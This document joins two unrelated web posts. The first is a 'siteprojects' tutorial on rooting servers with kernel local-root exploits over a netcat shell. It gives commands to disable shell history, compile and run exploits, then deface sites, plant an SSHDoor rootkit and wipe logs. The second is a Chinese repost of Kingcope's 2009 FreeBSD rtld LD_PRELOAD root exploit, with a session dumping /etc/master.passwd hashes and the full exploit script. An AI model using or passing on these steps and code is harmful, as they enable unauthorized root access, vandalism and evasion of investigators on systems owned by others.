2.6.17 – 2.6.24-1 -> jessica_biel_naked_in_my_bed.c

you can get it there update version on this site.

http://www.molotovbitch.org/localroot/

Once you have found the Kernel ver. of the server you are about to root you need to find
the Local Root Exploit for that kernel which you can find with google using the list
above. or just go here to make it easier!

http://www.molotovbitch.org/localroot/

Now check which exploit goes for which kernel, ok? you found it. good, before doing anything on this server, be as smart as possible, type this command

unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ;
this simply try to help your ass to to be traced by the histroy of your commands

Now comply and root.

To Compile your scripts go to
your shell that you have spawned with netcat and follow this instructions.

Code:
gcc xpl.c -o xpl
This will compile your xpl.c to a file named xpl.

From here now all you have to do is run your exploit which can be done by simply typing
in your netcat connection

Code:
./xpl

It should execute the exploit file which you have just compiled and give you root

then type
id; whoami

it should say, root, your are root

Congratulations! then remember me in your dream for posting this for your use.

remember, all exploits are not just compile and execute, some requires some little works eg h0llyshit. it require a big file to work.

example of h00lyshit here

before the compile)
For the h00lyshit we must type:
gcc h00lyshit.c -o h00lyshit
then you get h00lyshit.
The command to run this exploit is:
./h00lyshit
We need a very big file on the disk in order to run successfully and to get root.
We must create a big file in /tmp or into another writable folder.
The command is:
dd if=/dev/urandom of=largefile count=2M
where largefile is the filename.
please wait 2-3 minutes to get the file created!
If this command fails we can try:
dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024
Now we can procced to the last step. We can run the exploit by typing:
./h00lyshit largefile or
./h00lyshit /tmp/largefile
(If we are in a different writable folder and the largefile is created in /tmp)
If there are not running errors (maybe the kernel is patched or is something wrong with
exploit run or large file) we will get root
To check if we got root:
id or
whoami
If it says root we got root!
Now we can deface/mass deface all the sites of the server or to setup a rootkit (e.g.
SSHDoor) and to take ssh/telnet shell access to the server.
We must erase all logs in order to be safe with a log cleaner. A good cleaner for this
job is the MIG Log Cleaner. clean your tracks, never leave them uncleaned!

This tutorial is written by me, siteprojects
for more hands on training you can join me on my irc at irc.unixreal.net #siteprojects

I have provided some server for training.. so dont worry.

written by siteprojects and credit should be given to those who deserve it.

You have permission to post in another forum like always, but do not forget to give credit.
like I say, join irc.unixreal.net #siteprojects on details on how to get box rooted, LFI RFI SQL etc.

N jooooooooooooooy

Posted by siteprojects

FreeBSD爆严重安全漏洞

daxigua — Thu, 03 Dec 2009 05:51:01 +0000

From: http://seclists.org/fulldisclosure/2009/Nov/371

** FreeBSD local r00t 0day
Discovered & Exploited by Nikolaos Rangos also known as Kingcope.
Nov 2009 “BiG TiME”

“Go fetch your FreeBSD r00tkitz” // http://www.youtube.com/watch?v=dDnhthI27Fg

There is an unbelievable simple local r00t bug in recent FreeBSD versions.
I audited FreeBSD for local r00t bugs a long time *sigh*. Now it pays out.

The bug resides in the Run-Time Link-Editor (rtld).
Normally rtld does not allow dangerous environment variables like LD_PRELOAD
to be set when executing setugid binaries like “ping” or “su”.
With a rather simple technique rtld can be tricked into
accepting LD variables even on setugid binaries.
See the attached exploit for details.

Example exploiting session
**********************************
%uname -a;id;
FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
15:48:17 UTC 2009
root () almeida cse buffalo edu:/usr/obj/usr/src/sys/GENERIC i386
uid=1001(kcope) gid=1001(users) groups=1001(users)
%./w00t.sh
FreeBSD local r00t zeroday
by Kingcope
November 2009
env.c: In function ‘main’:
env.c:5: warning: incompatible implicit declaration of built-in
function ‘malloc’
env.c:9: warning: incompatible implicit declaration of built-in
function ‘strcpy’
env.c:11: warning: incompatible implicit declaration of built-in
function ‘execl’
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
/libexec/ld-elf.so.1: environment corrupt; missing value for
ALEX-ALEX
# uname -a;id;
FreeBSD r00tbox.Belkin 8.0-RELEASE FreeBSD 8.0-RELEASE #0: Sat Nov 21
15:48:17 UTC 2009
root () almeida cse buffalo edu:/usr/obj/usr/src/sys/GENERIC i386
uid=1001(kcope) gid=1001(users) euid=0(root) groups=1001(users)
# cat /etc/master.passwd
# $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29
kensmith Exp $
#
root:$1$AUbbHoOs$CCCsw7hsMB14KBkeS1xlz2:0:0::0:0:Charlie &:/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission
User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66::0:0:UUCP
pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
kcope:$1$u2wMkYLY$CCCuKax6dvYJrl2ZCYXA2:1001:1001::0:0:User
&:/home/kcope:/bin/sh
#

Systems tested/affected
**********************************
FreeBSD 8.0-RELEASE *** VULNERABLE
FreeBSD 7.1-RELEASE *** VULNERABLE
FreeBSD 6.3-RELEASE *** NOT VULN
FreeBSD 4.9-RELEASE *** NOT VULN

*EXPLOIT*

#!/bin/sh
echo ** FreeBSD local r00t zeroday
echo by Kingcope
echo November 2009
cat > env.c << _EOF
#include

main() {
extern char **environ;
environ = (char**)malloc(8096);

        environ[0] = (char*)malloc(1024);
        environ[1] = (char*)malloc(1024);
        strcpy(environ[1], “LD_PRELOAD=/tmp/w00t.so.1.0″);

execl(“/sbin/ping”, “ping”, 0);
}
_EOF
gcc env.c -o env
cat > program.c << _EOF
#include
#include
#include
#include

void _init() {
        extern char **environ;
        environ=NULL;
        system(“echo ALEX-ALEX;/bin/sh”);
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env

在圣诞节即将到来的日子，以安全著称的FreeBSD系统被著名黑客Kingcope爆了一个零日（0day）漏洞。据Kingcope所说，他长期致力于挖掘FreeBSD系统的本地提权漏洞，终于有幸在近期发现了这个非常低级的本地提权漏洞；这个漏洞存在于FreeBSD的Run-Time Link-Editor(rtld)程序中，普通用户可以通过该漏洞非常轻易的获得root权限。该漏洞影响非常广泛，包括FreeBSD 7.1至8.0的32及64位系统。

在展示该漏洞威力之前，我们科普一下著名黑客kingcope。从2007年6月至今，他一共公开了12个安全漏洞（没公开的不知道有多少），其中FreeBSD和Sun Solaris各两个，微软四个，Oracle、mysql、NcFTPD和nginx各一个，同时他还编写了多个漏洞的攻击代码，例如Sun Solaris telnetd及近期的IIS FTPd、Debian OpenSSH等。